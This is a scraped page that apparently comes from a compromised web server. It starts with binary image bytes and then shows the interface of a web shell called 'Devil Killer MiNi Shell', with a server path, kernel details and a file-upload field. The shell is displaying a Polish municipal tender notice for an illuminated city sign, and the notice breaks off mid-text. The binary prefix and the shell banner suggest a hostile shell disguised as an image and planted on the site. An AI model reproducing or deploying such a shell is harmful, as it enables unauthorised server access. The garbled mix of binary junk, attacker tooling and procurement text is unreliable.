JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211020/0023927001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie podświetlonej tablicy z nazwą miasta Kędzierzyn - Koźle na Skwerze Kolejarzy - II POSTĘPOWANIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kędzierzyn-Koźle - Urząd Miasta</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412912</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piramowicza 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@kedzierzynkozle.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kedzierzynkozle.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie podświetlonej tablicy z nazwą miasta Kędzierzyn - Koźle na Skwerze Kolejarzy - II POSTĘPOWANIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23b5247e-3193-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00239270</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001345/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.21 Budowa, przebudowa, rozbudowa oświetlenia ulicznego i miejsc publicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem<br/>https://e-propublico.pl.<br/>2. W uzasadnionych przypadkach np. awarii platformy dopuszczalna jest komunikacja za<br/>pośrednictwem poczty elektronicznej na adresy wskazane poniżej, z zastrzeżeniem, że ofertę składa<br/>się tylko za pośrednictwem platformy e-ProPublico.<br/>3. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>4. Postępowanie prowadzone jest na Platformie pod nazwą: Dokumentacja projektowo-kosztorysowa<br/>budowy monitoringu z uzupełnieniem oświetlenia na Plantach wraz z podłączeniem do systemu<br/>monitoringu miejskiego – znak sprawy: ZP.271.1.95.2021.AW.<br/>5. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki<br/>korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://e-<br/>ProPublico.pl/ oraz uznaje go za wiążący.<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>7. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z<br/>Platformy:<br/>1) stały dostęp do sieci Internet,<br/>2) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>3) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>4) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi,<br/>stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft<br/>Edge, Mozilla Firefox, Google Chrome, Opera),<br/>5) włączona obsługa JavaScript oraz Cookies.<br/>8. Zamawiający dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB wformatach: .pdf, .doc, .docx, .xls, .xlsx, .xml.<br/>9. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>1) dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym<br/>podpisem elektronicznym w formacie PAdES;<br/>2) dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xls, .xlsx, .xml)<br/>zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES;<br/>3) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub<br/>wyższego).<br/>10. Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych:<br/>1) załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie<br/>jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie<br/>zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert;<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w<br/>kolumnie ”Data przesłania”;<br/>3) o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/>11. Szczegółowe informacje o sposobie porozumiewania się i wymagania formalne dotyczące<br/>składanych dokumentów zostały opisano w rozdziale 13 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych jest Urząd Miasta Kędzierzyn-Koźle, z siedzibą przy<br/>ul. Grzegorza Piramowicza 32, 47-200 Kędzierzyn-Koźle, adres e-mail: prezydent@kedzierzynkozle.pl,<br/>tel. 77/40-50-338.;<br/>2) sposób kontaktu z inspektorem ochrony danych osobowych w Urzędzie Miasta Kędzierzyn-Koźle:<br/>47-200 Kędzierzyn-Koźle, ul. Grzegorza Piramowicza 32, adres e-mail: inspektor@kedzierzynkozle.pl,<br/>tel. 77/40-50-346;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także Spółka<br/>Datacomp Sp. z o.o. z siedzibą w Krakowie (adres: ul. Gen. Henryka Dąbrowskiego 24, 30-532<br/>Kraków), nr Rejestru KRS 0000193067, jako właściciel Platformy on-line działającej pod adresem<br/>https://e-ProPublico.pl/, na której Zamawiający prowadzi postępowania o udzielenie zamówienia<br/>publicznego;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych (tj. Dz.U z 2011 nr 14, poz. 67 z późn. zm.) teczki aktowe będą<br/>przechowywane w archiwum zakładowym przez okres 5 lat w przypadku dokumentacji zamówień<br/>publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie zamówień<br/>publicznych;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym<br/>korzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników);<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>- wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>2 nie przysługuje Pani/Panu:<br/>-w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; -na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>3 Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska<br/>od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>4 Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą Pzp.<br/>5 W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.95.2021.AW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie podświetlonej tablicy z nazwą miasta Kędzierzyn-<br/>Koźle na Skwerze Kolejarzy z usługą zaprojektowania, obejmujących w szczególności:<br/>1) wykonanie opracowań geodezyjnych (mapy do celów projektowych z danymi ewidencyjnymi<br/>oraz wypisy z rejestru gruntów);<br/>2) opracowanie dokumentacji projektowej oraz uzyskanie wszystkich wymaganych przepisami<br/>prawa uzgodnień, opinii czy decyzji;<br/>3) uzyskanie decyzji pozwolenia na budowę lub skuteczne zgłoszenie robót budowlanych;<br/>4) realizacja pełnego zakresu robót budowlano-montażowych, usług i dostaw niezbędnych dla<br/>użytkowania obiektu zgodnie z przeznaczeniem określonym w ww. dokumentacji.<br/>2. Zakres zamówienia obejmuje:<br/>1) opracowanie dokumentacji projektowej oraz uzyskanie wszystkich wymaganych przepisami<br/>prawa uzgodnień, opinii czy decyzji;<br/>2) uzyskanie decyzji pozwolenia na budowę lub skuteczne zgłoszenie robót budowlanych;<br/>3) realizacja pełnego zakresu robót budowlano-montażowych, usług i dostaw niezbędnych dla<br/>użytkowania obiektu zgodnie z przeznaczeniem określonym w ww. dokumentacji<br/>3. Zakres zamówienia obejmuje również:<br/>Na etapie wykonywania dokumentacji projektowej<br/>1) wykonanie opracowań przedprojektowych:<br/>a) opracowań geodezyjnych,<br/>2) opracowanie dokumentacji projektowej złożonej z:<br/>a) projektu budowlanego wraz z informacją dotyczącą bezpieczeństwa i ochrony zdrowia i<br/>zbiorem wszystkich wymaganych przepisami prawa warunków, uzgodnień, opinii czy decyzji<br/>(zwanym dalej „dokumentami formalno-prawnymi”), b) dokumentacji dla pozwolenia na budowę, zgłoszenia robót niewymagających pozwolenia na<br/>budowę lub dla obiektów do rozbiórki (w razie konieczności),<br/>c) projektu wykonawczego dla poszczególnych branż,<br/>d) przedmiaru robót dla poszczególnych branż;<br/>Na etapie robót budowlano-montażowych:<br/>1) Wykonanie podświetlonej tablicy,<br/>2) Wykonanie linii kablowej zasilającej podświetlenie tablicy.<br/>3) Posadowienie tablicy we wskazanym miejscu.<br/>4) Wykonanie dokumentacji powykonawczej.<br/>5) Organizację, zagospodarowanie i likwidację placu budowy.<br/>6) Zagospodarowanie odpadów powstałych przy realizacji przedmiotu umowy zgodnie z<br/>obowiązującymi przepisami dotyczącymi gospodarki odpadami. Wykonawca jest zobowiązany<br/>udokumentować Zamawiającemu sposób zagospodarowania powstałych w wyniku prowadzenia<br/>robót odpadów zgodnie z obowiązującymi przepisami dotyczącymi gospodarki odpadami nie<br/>później niż z dniem zawiadomienia o zakończeniu robót budowlanych.<br/>7) Próby i odbiory z udziałem wymaganych instytucji, inwestora i użytkownika.<br/>8) Naprawę zniszczonej nawierzchni na przyległym terenie<br/>9) Uporządkowanie terenu budowy po zakończeniu robót oraz terenu przylegającego do placu<br/>budowy, który został naruszony wskutek prowadzonych robót.<br/>4. Przedmiot zamówienia obejmuje również wykonanie następujących czynności:<br/>na etapie wykonywania dokumentacji projektowej:<br/>a) Uzyskanie warunków technicznych, Energetyka Miejskiego lub gestora sieci<br/>elektroenergetycznej;<br/>b) uzyskanie wszystkich wymaganych prawem (pozytywnych) uzgodnień, sprawdzeń, decyzji,<br/>opinii oraz pozwoleń;<br/>c) przekazywanie Zamawiającemu kopii uzyskanych dokumentów wymienionych w pkt b w<br/>terminie umożliwiającym ewentualne skorzystanie z trybu odwoławczego;<br/>d) sporządzenie innych, niewymienionych w umowie opracowań, których wykonanie będzie<br/>niezbędne dla uzyskania decyzji organów administracji państwowej, samorządowej lub innych<br/>jednostek branżowo uzgadniających opracowanie - z punktu widzenia kompletności przedmiotu<br/>umowy lub jej części składowej;<br/>e) na wniosek Zamawiającego - wyjaśnianie w sposób szczegółowy i wyczerpujący wątpliwości<br/>dotyczących rozwiązań projektowych oraz rozważenie możliwości zastosowania zamiennych<br/>materiałów/urządzeń/ wyposażenia/technologii robót;<br/>f) uzyskanie w imieniu i na rzecz Zamawiającego decyzji pozwolenia na budowę lub skuteczne<br/>zgłoszenie robót budowlanych.<br/>na etapie realizacji robót:<br/>a) kompleksową obsługę geodezyjną wraz z powykonawczą inwentaryzacją geodezyjną w 3 kpl.<br/>(w tym 1 kpl. na nośniku elektronicznym);<br/>b) organizację, zagospodarowanie i likwidację placu budowy;<br/>c) sporządzenie planu bezpieczeństwa i ochrony zdrowia, jeżeli odrębne przepisy wymagają<br/>sporządzenia takiego planu;<br/>d) zagospodarowanie odpadów powstałych przy realizacji przedmiotu umowy zgodnie z<br/>obowiązującymi przepisami dotyczącymi gospodarki odpadami. Wykonawca jest zobowiązany<br/>udokumentować Zamawiającemu sposób zagospodarowania powstałych w wyniku prowadzenia<br/>robót odpadów zgodnie z obowiązującymi przepisami dotyczącymi gospodarki odpadami nie<br/>później niż z dniem zawiadomienia o zakończeniu robót budowlanych.<br/>e) przeprowadzenie prób i odbiorów z udziałem wymaganych instytucji, Zamawiającego i<br/>Użytkownika;<br/>f) wykonanie remontu i naprawy zniszczonej nawierzchni na przyległym terenie;<br/>g) uporządkowanie terenu budowy po zakończeniu robót oraz terenu przyległego do placu<br/>budowy, który został naruszony wskutek prowadzonych robót.<br/>h) Wykonanie w okresie udzielonej przez Wykonawcę gwarancji wymaganych przeglądów<br/>gwarancyjnych zabudowanej tablicy, a także wykonanie czynności konserwacyjnych tejże tablicy, warunkujących utrzymanie gwarancji oraz prawidłowego funkcjonowania w okresie<br/>gwarancji i po jej zakończeniu.<br/>5. Wymóg zatrudnienia na podstawie umowy o pracę. Na podstawie 95 ust. 1 ustawy Pzp.<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie<br/>stosunku pracy, osób wykonujących następujące czynności związane z realizacją zamówienia:<br/>roboty budowlane branży elektrycznej.<br/>Sposób weryfikacji zatrudnienia, uprawnienia zamawiającego w zakresie kontroli oraz sankcje z<br/>tytułu niespełnienia wymagań zostały określone w części II SWZ – Projektowane postanowienia<br/>umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31523000-8 - Podświetlane znaki i szyldy</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena całkowita brutto [zł]<br/>Liczba punktów = (Cmin/Cof) * 60 pkt<br/>gdzie:<br/>- Cmin – najniższa cena spośród wszystkich ofert<br/>- Cof – cena badanej oferty<br/>2.Termin realizacji zamówienia [dni] nie dłużej niż 210 dni kalendarzowych od daty zawarcia umowy i<br/>nie krócej niż 180 dni kalendarzowych od daty zawarcia umowy (min oceniany).<br/>Liczba punktów = (T min/Tof) * 100 * waga<br/>gdzie:<br/>-T min -wartość najniższa spośród wszystkich ofert<br/>-T of -wartość badanej oferty<br/>Uwagi:<br/>Termin wykonania należy podać w dniach, licząc od daty zawarcia umowy. Zamawiający odrzuci<br/>oferty, które będą zakładały termin wykonania dłuższy niż 210 dni kalendarzowych od daty zawarcia<br/>umowy. Zamawiający odrzuci oferty, które będą zakładały termin wykonania krótszy niż 180 dni<br/>kalendarzowych od daty zawarcia umowy. W przypadku nie podania w ofercie któregokolwiek z<br/>terminów Zamawiający odrzuci ofertę.<br/>Pozostałe oferty otrzymają liczbę punktów wynikającą z liniowej zależności.<br/>3. Okres gwarancji (miesiące)- min. 36 max oceniany 60 miesięcy<br/>Sposób przyznania punktów w ramach kryterium terminu gwarancji:<br/>36 miesięcy- 0 pkt; 37 – 42 miesięcy –5 pkt;<br/>43 – 48 miesięcy – 10 